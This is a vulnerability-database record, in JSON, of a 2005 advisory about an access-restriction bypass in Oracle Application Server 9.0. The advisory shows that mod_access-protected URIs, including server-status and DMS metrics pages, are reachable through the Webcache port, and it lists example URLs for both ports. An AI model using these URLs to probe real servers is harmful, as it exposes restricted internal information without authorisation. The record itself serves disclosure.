Oracle Application Server 9.0 - HTTP Service Mod_Access Restriction Bypass
{"lastseen": "2020-04-01T19:04:39", "references": [], "description": "\nOracle Application Server 9.0 - HTTP Service Mod_Access Restriction Bypass", "edition": 1, "reporter": "Alexander Kornbrust", "exploitpack": {"type": "remote", "platform": "multiple"}, "published": "2005-04-28T00:00:00", "title": "Oracle Application Server 9.0 - HTTP Service Mod_Access Restriction Bypass", "type": "exploitpack", "enchantments": {"dependencies": {}, "score": {"value": 0.1, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.1}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2005-04-28T00:00:00", "id": "EXPLOITPACK:D7A06F3C2D90D1212085984FF0862D7B", "href": "", "viewCount": 5, "sourceData": "source: https://www.securityfocus.com/bid/13418/info\n\nOracle HTTP Server(OHS) of Oracle Application Server is prone to an access restriction bypass vulnerability.\n\nIt is possible to configure a list of forbidden URIs in OHS. This is accomplished using 'mod_access'. A URI that is listed is not supposed to be accessible to certain clients, depending on the configuration. However, reports indicate that the Oracle Webcache client may be used to access URIs regardless of the restrictions outlined in OHS 'mod_access'. \n\n(Port 7778 = Webcache, Port 7779 = OHS)\n\nThe following URLs are NOT protected if you access them via Webcache:\nhttp://example.com:7778/dmsoc4j/AggreSpy?format=metrictable&nountype=ohs_child&orderby=Name\nhttp://example.com:7778/server-status\nhttp://example.com:7778/dms0\n\nThe following URLs are protected:\nhttp://example.com:7779/dmsoc4j/AggreSpy?format=metrictable&nountype=ohs_child&orderby=Name\nhttp://example.com:7779/server-status\nhttp://example.com:7779/dms0", "cvss": {"score": 0.0, "vector": "NONE"}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645672675, "score": 1659818015}, "_internal": {"score_hash": "a35623cb92700d6a5a71bd56bfdf804d"}}